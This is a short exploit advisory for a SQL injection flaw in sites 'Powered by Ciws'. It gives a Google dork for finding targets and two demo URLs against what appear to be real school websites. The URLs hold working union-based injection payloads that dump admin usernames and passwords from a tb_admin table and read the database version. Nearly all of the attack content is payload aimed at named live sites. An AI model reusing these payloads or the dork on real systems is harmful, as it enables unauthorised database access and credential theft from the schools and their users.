********************************************************* #Exploit Title: Powered by Ciws - Sql Injection Vulnerability #Date: 2021-09-10 #Exploit Author: Behrouz Mansoori #Google Dork: "Powered by Ciws" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept:Powered by Ciws" ### Demo : http://www.schoolindia.org.in/newsdetail.php?id=-11%27%20union%20select%201,2,group_concat(username,0x3a,password),4,5,6,7%20from%20tb_admin--+ http://www.littleangelsbhopal.in/gallery_view.php?id=-19%27%20union%20select%201,version(),3--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: mr.mansoori@yahoo.com *********************************************************